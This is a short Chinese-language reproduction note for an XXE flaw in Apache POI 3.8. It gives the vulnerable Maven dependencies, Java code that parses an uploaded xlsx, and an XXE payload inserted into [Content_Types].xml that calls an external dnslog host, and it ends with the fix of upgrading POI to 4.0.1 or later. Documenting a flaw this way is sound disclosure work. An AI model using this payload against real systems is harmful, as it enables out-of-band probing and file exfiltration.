复现步骤
pom.xml引入依赖
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi</artifactId>
<version>3.8</version>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>3.8</version>
</dependency>
关键代码:
public String readExcelData(String path,String sheetName) throws IOException {
FileInputStream fileInputStream = null;
fileInputStream = new FileInputStream(path);
XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
//获取sheet
sheet = sheets.getSheet(sheetName);
//获取行数
int rows = sheet.getPhysicalNumberOfRows();
StringBuilder cell= new StringBuilder();
for (int i = 0; i < rows; i++) {
//获取列数
XSSFRow row = sheet.getRow(i);
int columns = row.getPhysicalNumberOfCells();
for (int j = 0; j < columns; j++) {
cell.append(row.getCell(j).toString()).append("</br>");
}
}
return cell.toString();
}
xxe.xlsx解压后,修改[Content_Types].xml,在第二行加入
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]> <x>&xxe;</x>
访问后即可触发dnslog
解决方案:
升级poi到4.0.1以上版本